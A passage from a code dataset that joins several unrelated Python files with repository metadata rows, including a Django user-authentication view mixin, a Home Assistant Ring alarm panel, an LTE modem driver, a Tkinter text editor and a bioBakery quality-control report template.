grades[game_result['win']] += BASE_SCORE * (2 - 1.6*(game_result['taken'] - MIN_TAKEN)/(MAX_TAKEN - MIN_TAKEN))
grades[game_result['lose']] -= BASE_SCORE * (2 - 1.6*(game_result['taken'] - MIN_TAKEN)/(MAX_TAKEN - MIN_TAKEN))
commands = []
for changed_user_id in changed_users_id:
commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
put_change_grade(commands)
def change_grade_simplequadratic(grades, game_results):
MAX_TAKEN = 40
changed_users_id = set()
for game_result in game_results:
changed_users_id.add(game_result['win'])
changed_users_id.add(game_result['lose'])
grades[game_result['win']] += (MAX_TAKEN - game_result['taken'])**2
grades[game_result['lose']] -= (MAX_TAKEN - game_result['taken'])**2
commands = []
for changed_user_id in changed_users_id:
commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
put_change_grade(commands)
def change_grade_preventabusediscountedlinear(grades, game_results, suspicion_marks):
BASE_SCORE = 4000
MIN_TAKEN = 3
MAX_TAKEN = 40
changed_users_id = set()
for game_result in game_results:
winner = game_result['win']
loser = game_result['lose']
game_time = game_result['taken']
changed_users_id.add(winner)
changed_users_id.add(loser)
if game_time < 11:
expected_game_time = 40 - abs(grades[winner] - grades[loser])/99000*35
tolerance = 5 + 5
if game_time < expected_game_time - tolerance:
suspicion_marks[loser] += 1
if suspicion_marks[loser] > 2:
continue
expected_win_rate = grades[winner]/(grades[winner] + grades[loser])
win_rate_modifier = expected_win_rate # (expected_win_rate - 0.3)*2 + 0.2
grades[winner] += win_rate_modifier*BASE_SCORE*(3 - 2.5*(game_time - MIN_TAKEN)/(MAX_TAKEN - MIN_TAKEN))
grades[loser] -= win_rate_modifier*BASE_SCORE*(3 - 2.5*(game_time - MIN_TAKEN)/(MAX_TAKEN - MIN_TAKEN))
commands = []
for changed_user_id in changed_users_id:
commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
put_change_grade(commands)
| 36.656566 | 120 | 0.673188 | 497 | 3,629 | 4.56338 | 0.136821 | 0.110229 | 0.117284 | 0.059965 | 0.681658 | 0.661817 | 0.660935 | 0.655644 | 0.655644 | 0.619929 | 0 | 0.018776 | 0.207495 | 3,629 | 98 | 121 | 37.030612 | 0.769819 | 0.032791 | 0 | 0.533333 | 0 | 0 | 0.033952 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.026667 | 0 | 0.093333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
494cefc1f9462c0538e6c405bcec6cc75cbab494 | 1,136 | py | Python | misc/texteditor.py | disc0nnctd/myPythonCodesDC | 378b0cf749124ef8b7f8d70f6f298faa6c9f73de | [
"MIT"
] | 1 | 2017-04-30T18:20:32.000Z | 2017-04-30T18:20:32.000Z | misc/texteditor.py | disc0nnctd/myPythonCodesDC | 378b0cf749124ef8b7f8d70f6f298faa6c9f73de | [
"MIT"
] | 1 | 2017-04-30T10:09:45.000Z | 2017-04-30T12:39:19.000Z | misc/texteditor.py | disc0nnctd/myPythonCodesDC | 378b0cf749124ef8b7f8d70f6f298faa6c9f73de | [
"MIT"
] | 1 | 2017-04-30T09:54:08.000Z | 2017-04-30T09:54:08.000Z | """A simple text editor made in Python 2.7."""
from os import path, chdir
workingdir = path.join(path.dirname(__file__), 'texts')
chdir(workingdir)
from Tkinter import Tk, Text, Button
import tkFileDialog
root = Tk("Text Editor")
text = Text(root)
text.grid()
def saveas():
"""Save file."""
try:
t = text.get("1.0", "end-1c") # "1.0" means read from beginning
# "end-1c" means delete last character
savelocation = tkFileDialog.asksaveasfilename()
file1 = open(savelocation, "w")
file1.write(t)
file1.close
except IOError:
pass
def openfile():
"""Open file."""
try:
location = tkFileDialog.askopenfilename()
file1 = open(location, "r")
fileContents = file1.read()
text.delete(1.0, "end")
text.insert(1.0, fileContents)
except IOError:
pass
button = Button(root, text="Open", command=openfile)
button.grid()
button = Button(root, text="Save As", command=saveas)
button.grid()
root.mainloop()
workingdir = path.join(path.dirname(__file__))
chdir(workingdir)
| 25.244444 | 73 | 0.611796 | 136 | 1,136 | 5.051471 | 0.441176 | 0.011645 | 0.052402 | 0.064047 | 0.09607 | 0.09607 | 0 | 0 | 0 | 0 | 0 | 0.020047 | 0.253521 | 1,136 | 44 | 74 | 25.818182 | 0.790094 | 0.116197 | 0 | 0.30303 | 0 | 0 | 0.043478 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0.060606 | 0.090909 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4953b0d0a882cec4862d24ffe94ed3594bc14dec | 1,816 | py | Python | insighioNode/lib/networking/modem/modem_sequans.py | insighio/insighioNode | 396b0858ffb265ac66075e8b9d90713ffae7ffb8 | [
"MIT"
] | 5 | 2021-06-11T09:03:12.000Z | 2021-12-22T09:04:57.000Z | insighioNode/lib/networking/modem/modem_sequans.py | insighio/insighioNode | 396b0858ffb265ac66075e8b9d90713ffae7ffb8 | [
"MIT"
] | 1 | 2021-06-11T14:15:05.000Z | 2021-06-11T14:15:33.000Z | insighioNode/lib/networking/modem/modem_sequans.py | insighio/insighioNode | 396b0858ffb265ac66075e8b9d90713ffae7ffb8 | [
"MIT"
] | null | null | null | from modem_base import Modem
from network import LTE
import logging
class ModemSequans(Modem):
def __init__(self):
self.lte = LTE()
def power_on(self):
self.lte.init()
def power_off(self):
self.lte.deinit(dettach=True, reset=True)
def init(self):
return True
def connect(self, timeoutms=30000):
(status, lines) = self.send_at_cmd('AT+CGDATA="PPP",1', 30000, "CONNECT")
if not status:
return False
import network
self.ppp = network.PPP(self.uart)
self.ppp.active(True)
self.ppp.connect()
start_timestamp = utime.ticks_ms()
timeout_timestamp = start_timestamp + timeoutms
while utime.ticks_ms() < timeout_timestamp:
self.connected = self.is_connected()
if self.connected:
break
utime.sleep_ms(100)
return self.connected
def is_connected(self):
return self.lte.isconnected()
def disconnect(self):
if self.ppp:
self.ppp.active(False)
self.connected = False
(status, _) = self.send_at_cmd("AT+CGACT=0,1")
return status
# to be overriden by children
def set_gps_state(self, poweron=True):
pass
# to be overriden by children
def is_gps_on(self):
return False
def get_gps_position(self, timeoutms=300000):
return None
def send_at_cmd(self, command, timeoutms=30000, success_condition="OK"):
response = ""
status = False
logging.debug(command)
response = self.lte.send_at_cmd(command)
if response:
response = response.strip().splitlines()
logging.debug(response)
status = (response.find("OK") != -1)
return (status, response)
| 24.540541 | 81 | 0.601872 | 219 | 1,816 | 4.844749 | 0.342466 | 0.032988 | 0.03393 | 0.024505 | 0.130066 | 0.04901 | 0 | 0 | 0 | 0 | 0 | 0.021961 | 0.297907 | 1,816 | 73 | 82 | 24.876712 | 0.810196 | 0.030286 | 0 | 0.038462 | 0 | 0 | 0.022753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.211538 | false | 0.019231 | 0.076923 | 0.076923 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
496001f2e20c60b98e9d4d0701aee95ac8df87b1 | 3,692 | py | Python | alarm_control_panel.py | rs1932/homeassistant-ring_alarm_component | b65b8ee1bc7e7408c3bc1adb6fd4e3f4ebf330d6 | [
"Apache-2.0"
] | 4 | 2019-09-07T23:15:54.000Z | 2020-04-20T22:47:37.000Z | alarm_control_panel.py | rs1932/homeassistant-ring_alarm_component | b65b8ee1bc7e7408c3bc1adb6fd4e3f4ebf330d6 | [
"Apache-2.0"
] | 3 | 2019-09-10T00:03:24.000Z | 2020-10-02T13:26:08.000Z | alarm_control_panel.py | rs1932/homeassistant-ring_alarm_component | b65b8ee1bc7e7408c3bc1adb6fd4e3f4ebf330d6 | [
"Apache-2.0"
] | 3 | 2019-11-19T11:03:01.000Z | 2021-05-12T20:11:16.000Z | import logging
import pandas as pd
from homeassistant.components.alarm_control_panel import (
AlarmControlPanel
)
from homeassistant.core import callback
from homeassistant.util import convert
from .ringalarmdevice import RingAlarmDevice
from .constants import *
from homeassistant.const import (
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_DISARMED
)
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_devices, device):
# for index, device in devices.iterrows():
add_devices([RingAlarmControlPanel(device)], True)
class RingAlarmControlPanel(RingAlarmDevice, AlarmControlPanel):
def __init__(self, ringalarm_device):
super().__init__(ringalarm_device)
try:
if ringalarm_device[DEVICE_ALARM_MODE] == "none":
self._state = STATE_ALARM_DISARMED
except:
pass
try:
if ringalarm_device[DEVICE_ALARM_MODE] == "some":
self._state = STATE_ALARM_ARMED_HOME
except:
pass
try:
if ringalarm_device[DEVICE_ALARM_MODE] == "all":
self._state = STATE_ALARM_ARMED_AWAY
except:
pass
try:
self._tamper_status = ringalarm_device[DEVICE_TAMPER_STATUS]
except:
pass
def update(self):
pass
def alarm_disarm(self, code=None):
"""Send disarm command."""
try:
self.controller.ring_api.send_command_ring(self.ringalarm_device[DEVICE_ZID],
self.ringalarm_device[DEVICE_SOURCE],
'security-panel.switch-mode',
data={'mode': 'none', "bypass": None})
except:
pass
def alarm_arm_home(self, code=None):
"""Send arm home command."""
try:
self.controller.ring_api.send_command_ring(self.ringalarm_device[DEVICE_ZID],
self.ringalarm_device[DEVICE_SOURCE],
'security-panel.switch-mode',
data={'mode': 'some', "bypass": None})
except:
pass
def alarm_arm_away(self, code=None):
"""Send arm away command."""
try:
self.controller.ring_api.send_command_ring(self.ringalarm_device[DEVICE_ZID],
self.ringalarm_device[DEVICE_SOURCE],
'security-panel.switch-mode',
data={'mode': 'all', "bypass": None})
except:
pass
def update_callback(self, data):
try:
if data[DEVICE_ALARM_MODE] == "none":
self._state = STATE_ALARM_DISARMED
except:
pass
try:
if data[DEVICE_ALARM_MODE] == "some":
self._state = STATE_ALARM_ARMED_HOME
except:
pass
try:
if data[DEVICE_ALARM_MODE] == "all":
self._state = STATE_ALARM_ARMED_AWAY
except:
pass
self.schedule_update_ha_state(True)
@property
def changed_by(self):
"""Last change triggered by."""
return None
@property
def code_arm_required(self):
"""Whether the code is required for arm actions."""
return True
@property
def state(self):
"""Get the state of the device."""
return self._state
| 31.288136 | 93 | 0.54117 | 357 | 3,692 | 5.305322 | 0.243697 | 0.095037 | 0.110876 | 0.06019 | 0.504752 | 0.472545 | 0.467793 | 0.424498 | 0.420275 | 0.404435 | 0 | 0 | 0.377302 | 3,692 | 117 | 94 | 31.555556 | 0.823836 | 0.056609 | 0 | 0.538462 | 0 | 0 | 0.040846 | 0.022596 | 0 | 0 | 0 | 0 | 0 | 1 | 0.10989 | false | 0.153846 | 0.087912 | 0 | 0.241758 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4961cb44515f6694bce4182b84680ae488d272d1 | 14,882 | py | Python | binder/plugins/views/userview.py | asma-oueslati/django-binder | 0a16a928664b4be2b2b8e3f5f65c29301f0096fe | [
"MIT"
] | null | null | null | binder/plugins/views/userview.py | asma-oueslati/django-binder | 0a16a928664b4be2b2b8e3f5f65c29301f0096fe | [
"MIT"
] | null | null | null | binder/plugins/views/userview.py | asma-oueslati/django-binder | 0a16a928664b4be2b2b8e3f5f65c29301f0096fe | [
"MIT"
] | null | null | null | import logging
import json
from abc import ABCMeta, abstractmethod
from django.contrib import auth
from django.contrib.auth import update_session_auth_hash, password_validation
from django.contrib.auth.tokens import default_token_generator
from django.core.exceptions import ValidationError, PermissionDenied
from django.http import HttpResponse
from django.utils.decorators import method_decorator
from django.views.decorators.debug import sensitive_post_parameters
from django.views.decorators.cache import never_cache
from django.utils.translation import ugettext as _
from binder.permissions.views import no_scoping_required
from binder.exceptions import BinderForbidden, BinderReadOnlyFieldError, BinderMethodNotAllowed, BinderIsNotDeleted, \
BinderIsDeleted, BinderNotAuthenticated, BinderFieldTypeError, BinderRequestError, BinderValidationError, \
BinderNotFound
from binder.router import list_route, detail_route
from binder.json import JsonResponse
from binder.views import annotate
logger = logging.getLogger(__name__)
class UserBaseMixin:
__metaclass__ = ABCMeta
def respond_with_user(self, request, user_id):
return JsonResponse(
self._get_objs(
annotate(self.get_queryset(request).filter(pk=user_id), request),
request=request,
)[0]
)
class MasqueradeMixin(UserBaseMixin):
__metaclass__ = ABCMeta
@detail_route(name='masquerade')
@no_scoping_required()
def masquerade(self, request, pk=None):
from hijack.helpers import login_user
if request.method != 'POST':
raise BinderMethodNotAllowed()
try:
user = self.model._default_manager.get(pk=pk)
except self.model.DoesNotExist:
raise BinderNotFound()
self._require_model_perm('masquerade', request)
login_user(request, user) # Ignore returned redirect response object
return self.respond_with_user(request, user.id)
@list_route(name='endmasquerade')
@no_scoping_required()
def endmasquerade(self, request):
from hijack.helpers import release_hijack
if request.method != 'POST':
raise BinderMethodNotAllowed()
self._require_model_perm('unmasquerade', request)
release_hijack(request) # Ignore returned redirect response object
return self.respond_with_user(request, request.user.id)
def _logout(self, request):
from hijack.helpers import release_hijack
# Release masquerade on logout if masquerading
try:
release_hijack(request)
except PermissionDenied: # Means we are not hijacked
super()._logout(request)
class UserViewMixIn(UserBaseMixin):
__metaclass__ = ABCMeta
log_request_body = False
token_generator = default_token_generator
default_authentication_backend = None
def _require_model_perm(self, perm_type, request, pk=None):
"""
Overwrite the _require_model_perm, to make sure that you can not modify a superuser as non superuser
We need to be very careful about permission assumptions after this point
"""
# If the user is trying to change a superuser and is not a superuser, disallow
if pk and self.model.objects.get(pk=int(pk)).is_superuser and not request.user.is_superuser:
# Maybe BinderRequestError?
raise BinderForbidden('modify superuser', request.user)
# Everything normal
return super()._require_model_perm(perm_type, request, pk)
def _store__groups(self, obj, field, value, request, pk=None):
"""
Store the groups of the user.
If we get here, the user might not actually have admin permissions;
If the user does not have user change perms, disallow setting groups.
"""
try:
self._require_model_perm('changegroups', request)
return self._store_field(obj, field, value, request, pk=pk)
except BinderForbidden: # convert to read-only error, so the field is ignored
raise BinderReadOnlyFieldError(self.model.__name__, field)
def authenticate(self, request, **kwargs):
return auth.authenticate(request, **kwargs)
def auth_login(self, request, user, backend=None):
return auth.login(request, user, backend=(
backend or
getattr(user, 'backend', None) or
self.default_authentication_backend
))
@method_decorator(sensitive_post_parameters())
@list_route(name='login', unauthenticated=True)
@no_scoping_required()
def login(self, request):
"""
Login the user
Request:
POST user/login/
{
"username": "foo",
"password": "password"
}
Response:
returns the same parameters as GET user/{id}/
"""
if request.method != 'POST':
raise BinderMethodNotAllowed()
try:
decoded = request.body.decode()
body = json.loads(decoded)
username = body.get(self.model.USERNAME_FIELD, '')
password = body.get('password', '')
except Exception:
username = request.POST.get(self.model.USERNAME_FIELD, '')
password = request.POST.get('password', '')
user = self.authenticate(request, **{
self.model.USERNAME_FIELD: username.lower(),
'password': password,
})
self._require_model_perm('login', request)
if user is None:
logger.info('login failed for "{}"'.format(username))
raise BinderNotAuthenticated()
else:
self.auth_login(request, user)
logger.info('login for {}/{}'.format(user.id, user))
return self.respond_with_user(request, user.id)
def _logout(self, request):
auth.logout(request)
@list_route(name='logout')
@no_scoping_required()
def logout(self, request):
"""
Logout the user
Request:
POST /user/logout/
{}
Response:
204
{}
"""
if request.method != 'POST':
raise BinderMethodNotAllowed()
self._require_model_perm('logout', request)
logger.info('logout for {}/{}'.format(request.user.id, request.user))
self._logout(request)
return HttpResponse(status=204)
def get_users(self, request, username):
"""
Given a username, return matching user(s) who should receive a reset.
This allows subclasses to more easily customize the default policies
that prevent inactive users and users with unusable passwords from
resetting their password.
Copied from django.contrib.auth.forms.PasswordResetForm
"""
active_users = self.model._default_manager.filter(**{
self.model.USERNAME_FIELD + '__iexact': username,
'is_active': True,
})
return (u for u in active_users if u.has_usable_password())
def _store__username(self, user, field, value, request, pk=None):
"""
Makes sure the username is always stored as a lowercase
"""
if not isinstance(value, str):
raise BinderFieldTypeError(self.model.__name__, field)
return self._store_field(user, field, value.lower(), request, pk=pk)
def filter_deleted(self, queryset, pk, deleted, request=None):
"""
Can be used to filter deleted users, or unfilter them.
"""
if pk or deleted == 'true':
return queryset
if deleted is None:
return queryset.filter(is_active=True)
if deleted == 'only':
return queryset.filter(is_active=False)
raise BinderRequestError(_('Invalid value: deleted=%s.') % request.GET.get('deleted'))
def soft_delete(self, user, undelete=False, request=None):
"""
Allows the user to be soft deleted, and undeleted. What actually needs to be done on soft deletion
can be implemented in
_after_soft_delete
"""
try:
if not user.is_active and not undelete:
raise BinderIsDeleted()
if not not user.is_active and undelete:
raise BinderIsNotDeleted()
except AttributeError:
raise BinderMethodNotAllowed()
user.is_active = undelete
user.save()
self._after_soft_delete(request, user, undelete)
@list_route(name='reset_request', unauthenticated=True)
@no_scoping_required()
def reset_request(self, request):
"""
Adds an endpoint to do a reset request. Generates a token, and calls the _send_reset_mail callback if the reset
request is successful
Request:
POST user/reset_request/
{
'username': 'foo'
}
Response:
204
{
}
"""
if request.method != 'POST':
raise BinderMethodNotAllowed()
self._require_model_perm('reset_password', request)
decoded = request.body.decode()
try:
body = json.loads(decoded)
except ValueError:
raise BinderRequestError(_('Invalid request body: not a JSON document.'))
logger.info('password reset attempt for {}'.format(body.get(self.model.USERNAME_FIELD, '')))
for user in self.get_users(request, body.get(self.model.USERNAME_FIELD, '').lower()):
token = self.token_generator.make_token(user)
self._send_reset_mail(request, user, token)
return HttpResponse(status=204)
@never_cache
@list_route(name='send_activation_email', unauthenticated=True)
@no_scoping_required()
def send_activation_email(self, request):
"""
Endpoint that can be used to send an activation mail for an user.
Calls the _send_activation_email callback if the user is succesfully activated
Request:
POST
{
"email": "email"
}
Response:
{
"code": code
}
Possible codes:
sent Mail is send sucessfully
already active User is already active, no mail was send
blacklisted User was not activated
"""
if request.method != 'PUT':
raise BinderMethodNotAllowed()
# For lack of a better check
self._require_model_perm('reset_password', request)
decoded = request.body.decode()
try:
body = json.loads(decoded)
except ValueError:
raise BinderRequestError(_('Invalid request body: not a JSON document.'))
logger.info('activation email attempt for {}'.format(body.get('email', '')))
if body.get('email') is None:
raise BinderValidationError({'email': ['missing']})
try:
user = self.model._default_manager.get(email=body.get('email'))
except self.model.DoesNotExist:
raise BinderNotFound()
if user.is_active:
if user.last_login is None:
# TODO: Figure out a way to make this customisable without
# allowing injection of arbitrary URLs (phishing!)
self._send_activation_email(request, user)
response = JsonResponse({'code': 'sent'})
response.status_code = 201
else:
response = JsonResponse({'code': 'already active'})
else:
response = JsonResponse({'code': 'blacklisted'})
response.status_code = 400
return response
@method_decorator(sensitive_post_parameters())
@never_cache
@detail_route(name='activate', unauthenticated=True)
@no_scoping_required()
def activate(self, request, pk=None):
"""
Adds an endpoint to activate an user. Also logs in the user
Request:
PUT user/{id}/activate/
{
"activation_code": string
}
Response:
Same as GET user/{id}/
"""
if request.method != 'PUT':
raise BinderMethodNotAllowed()
self._require_model_perm('activate', request)
decoded = request.body.decode()
try:
body = json.loads(decoded)
except ValueError:
raise BinderRequestError(_('Invalid request body: not a JSON document.'))
errors = {}
for item in ['activation_code']:
if body.get(item) is None:
errors[item] = ['missing']
if len(errors) != 0:
raise BinderValidationError(errors)
try:
user = self.model._default_manager.get(pk=pk)
except (TypeError, ValueError, OverflowError, self.model.DoesNotExist):
user = None
if user is None or not self.token_generator.check_token(user, body.get('activation_code')):
raise BinderNotFound()
logger.info('login for {}/{} via successful activation'.format(user.id, user))
user.is_active = True
user.save()
self.auth_login(request, user)
return self.respond_with_user(request, user.id)
@method_decorator(sensitive_post_parameters())
@never_cache
@detail_route(name='reset_password', unauthenticated=True, methods=['PUT'])
@no_scoping_required()
def reset_password(self, request, pk=None):
"""
Resets the password from an reset code
Request:
POST user/reset_password/
{
"reset_code": str,
"password": str
}
Response:
Same as GET user/{id}/
"""
self._require_model_perm('reset_password', request)
decoded = request.body.decode()
try:
body = json.loads(decoded)
except ValueError:
raise BinderRequestError(_('Invalid request body: not a JSON document.'))
errors = {item: 'missing' for item in ['reset_code', 'password'] if item not in body}
if errors:
raise BinderValidationError(errors)
return self._reset_pass_for_user(request, int(pk), body['reset_code'], body['password'])
def _reset_pass_for_user(self, request, user_id, token, password):
"""
Helper function that actually resets the password for an user
"""
try:
user = self.model._default_manager.get(pk=user_id)
except (TypeError, ValueError, OverflowError, self.model.DoesNotExist):
user = None
if user is None or not self.token_generator.check_token(user, token):
raise BinderNotFound()
logger.info('login for {}/{} via successful password reset'.format(user.id, user))
try:
password_validation.validate_password(password, user)
except ValidationError as ve:
raise BinderValidationError({'password': ve.messages})
user.set_password(password)
user.save()
self.auth_login(request, user)
return self.respond_with_user(request, user.id)
@method_decorator(sensitive_post_parameters())
@never_cache
@list_route(name='change_password')
@no_scoping_required()
def change_password(self, request):
"""
Change the password from an old password
Request:
POST user/change_password/
{
"old_password": str,
"new_password": str
}
Response:
Same as GET user/{id}/
"""
if request.method != 'PUT':
raise BinderMethodNotAllowed()
self._require_model_perm('change_own_password', request)
decoded = request.body.decode()
try:
body = json.loads(decoded)
except ValueError:
raise BinderRequestError(_('Invalid request body: not a JSON document.'))
user = request.user
errors = {}
for item in ['old_password', 'new_password']:
if body.get(item) is None:
errors[item] = ['missing']
if not user.check_password(body.get('old_password')):
errors['old_password'] = ['incorrect']
if len(errors) != 0:
raise BinderValidationError(errors)
password = body.get('new_password')
try:
password_validation.validate_password(password, user)
except ValidationError as ve:
validation_errors = {'new_password': ve.messages}
raise BinderValidationError(validation_errors)
user.set_password(password)
user.save()
logger.info('password changed for {}/{}'.format(user.id, user))
if user == request.user:
"""
No need to change the password of an user that is not our own
"""
update_session_auth_hash(request, user)
return self.respond_with_user(request, user.id)
@abstractmethod
def _after_soft_delete(self, request, user, undelete):
"""
Callback called after an user is softdeleted or softundeleted
"""
pass
@abstractmethod
def _send_reset_mail(self, request, user, token):
"""
Callback to send the actual reset mail using the token.
"""
pass
@abstractmethod
def _send_activation_email(self, request, user):
"""
Callback to send a mail notifying that the user is activated.
"""
pass
| 27.009074 | 118 | 0.73216 | 1,909 | 14,882 | 5.546883 | 0.167627 | 0.028048 | 0.019643 | 0.018888 | 0.354708 | 0.312211 | 0.26197 | 0.236755 | 0.210313 | 0.206346 | 0 | 0.001681 | 0.160731 | 14,882 | 550 | 119 | 27.058182 | 0.846117 | 0.197621 | 0 | 0.459732 | 0 | 0 | 0.088969 | 0.001807 | 0 | 0 | 0 | 0.001818 | 0 | 1 | 0.080537 | false | 0.107383 | 0.067114 | 0.010067 | 0.244966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
49633e3a1fe78865b9e181ac00df94f57d6194b3 | 3,303 | py | Python | plenum/test/plugin/demo_plugin/main.py | SchwiftyRick/indy-plenum | d23b99423eb805971e50446d7e89ada892aa6811 | [
"Apache-2.0"
] | null | null | null | plenum/test/plugin/demo_plugin/main.py | SchwiftyRick/indy-plenum | d23b99423eb805971e50446d7e89ada892aa6811 | [
"Apache-2.0"
] | 1 | 2021-07-14T17:10:04.000Z | 2021-07-14T17:10:04.000Z | plenum/test/plugin/demo_plugin/main.py | SchwiftyRick/indy-plenum | d23b99423eb805971e50446d7e89ada892aa6811 | [
"Apache-2.0"
] | 2 | 2021-02-19T15:36:50.000Z | 2021-07-20T11:37:54.000Z | from plenum.common.constants import DOMAIN_LEDGER_ID
from plenum.server.client_authn import CoreAuthNr
from plenum.test.plugin.demo_plugin import AUCTION_LEDGER_ID
from plenum.test.plugin.demo_plugin.batch_handlers.auction_batch_handler import AuctionBatchHandler
from plenum.test.plugin.demo_plugin.config import get_config
from plenum.test.plugin.demo_plugin.request_handlers.auction_end_handler import AuctionEndHandler
from plenum.test.plugin.demo_plugin.request_handlers.auction_start_handler import AuctionStartHandler
from plenum.test.plugin.demo_plugin.request_handlers.get_bal_handler import GetBalHandler
from plenum.test.plugin.demo_plugin.request_handlers.place_bid_handler import PlaceBidHandler
from plenum.test.plugin.demo_plugin.storage import get_auction_hash_store, \
get_auction_ledger, get_auction_state
def integrate_plugin_in_node(node):
node.config = get_config(node.config)
hash_store = get_auction_hash_store(node.dataLocation)
ledger = get_auction_ledger(node.dataLocation,
node.config.auctionTransactionsFile,
hash_store, node.config)
state = get_auction_state(node.dataLocation,
node.config.auctionStateDbName,
node.config)
if AUCTION_LEDGER_ID not in node.ledger_ids:
node.ledger_ids.append(AUCTION_LEDGER_ID)
node.ledgerManager.addLedger(AUCTION_LEDGER_ID,
ledger,
postTxnAddedToLedgerClbk=node.postTxnFromCatchupAddedToLedger)
node.on_new_ledger_added(AUCTION_LEDGER_ID)
node.register_state(AUCTION_LEDGER_ID, state)
auctions = {}
node.write_manager.register_req_handler(AuctionStartHandler(node.db_manager, auctions))
node.write_manager.register_req_handler(AuctionEndHandler(node.db_manager, auctions))
node.write_manager.register_req_handler(PlaceBidHandler(node.db_manager, auctions))
node.read_manager.register_req_handler(GetBalHandler(node.db_manager))
# FIXME: find a generic way of registering DBs
node.db_manager.register_new_database(lid=AUCTION_LEDGER_ID,
ledger=ledger,
state=state)
node.write_manager.register_batch_handler(AuctionBatchHandler(node.db_manager),
ledger_id=AUCTION_LEDGER_ID,
add_to_begin=True)
node.write_manager.register_batch_handler(node.write_manager.node_reg_handler,
ledger_id=AUCTION_LEDGER_ID)
node.write_manager.register_batch_handler(node.write_manager.primary_reg_handler,
ledger_id=AUCTION_LEDGER_ID)
node.write_manager.register_batch_handler(node.write_manager.audit_b_handler,
ledger_id=AUCTION_LEDGER_ID)
auction_authnr = CoreAuthNr(node.write_manager.txn_types,
node.read_manager.txn_types,
node.action_manager.txn_types,
node.states[DOMAIN_LEDGER_ID])
node.clientAuthNr.register_authenticator(auction_authnr)
return node
| 58.982143 | 101 | 0.693612 | 370 | 3,303 | 5.832432 | 0.235135 | 0.063021 | 0.07646 | 0.074143 | 0.37164 | 0.349398 | 0.263207 | 0.243744 | 0.202039 | 0.12975 | 0 | 0 | 0.247654 | 3,303 | 55 | 102 | 60.054545 | 0.86841 | 0.013321 | 0 | 0.06 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018182 | 0 | 1 | 0.02 | false | 0 | 0.2 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
496648c5898f258ebf19c8b06ad31502f0290680 | 5,213 | py | Python | biobakery_workflows/document_templates/quality_control_paired_dna_rna.template.py | shbrief/biobakery_workflows | 2037f45caa8e4af9a40b5c1d2886cde15bc00381 | [
"MIT"
] | 1 | 2020-11-16T20:04:15.000Z | 2020-11-16T20:04:15.000Z | biobakery_workflows/document_templates/quality_control_paired_dna_rna.template.py | mlwright97/biobakery_workflows | b3e74f25253d7354bebd02936ac25986281e85d6 | [
"MIT"
] | null | null | null | biobakery_workflows/document_templates/quality_control_paired_dna_rna.template.py | mlwright97/biobakery_workflows | b3e74f25253d7354bebd02936ac25986281e85d6 | [
"MIT"
] | null | null | null |
#+ echo=False
import numpy
from biobakery_workflows import utilities, visualizations, files
from anadama2 import PweaveDocument
document=PweaveDocument()
# get the variables for this document generation task
vars = document.get_vars()
# determine the document format
pdf_format = True if vars["format"] == "pdf" else False
# read in the DNA samples
(dna_paired_columns, dna_orphan_columns), dna_samples, (dna_paired_data, dna_orphan_data) = visualizations.qc_read_counts(document, vars["dna_read_counts"])
# read in the RNA samples
(rna_paired_columns, rna_orphan_columns), rna_samples, (rna_paired_data, rna_orphan_data) = visualizations.qc_read_counts(document, vars["rna_read_counts"])
#' # Quality Control
#' <% visualizations.ShotGun.print_qc_intro_caption("{} DNA and {} RNA ".format(len(dna_samples),len(rna_samples)), rna_paired_columns[2:], paired=True) %>
#+ echo=False
#' ## DNA Samples Quality Control
#' ### DNA Samples Tables of Filtered Reads
#+ echo=False
document.write_table(["# Sample"]+dna_paired_columns, dna_samples, dna_paired_data,
files.ShotGunVis.path("qc_counts_paired",document.data_folder))
table_message=visualizations.show_table_max_rows(document, dna_paired_data, dna_samples,
dna_paired_columns, "DNA Paired end reads", files.ShotGunVis.path("qc_counts_paired"),
format_data_comma=True)
#' <%= table_message %>
#+ echo=False
document.write_table(["# Sample"]+dna_orphan_columns, dna_samples, dna_orphan_data,
files.ShotGunVis.path("qc_counts_orphan",document.data_folder))
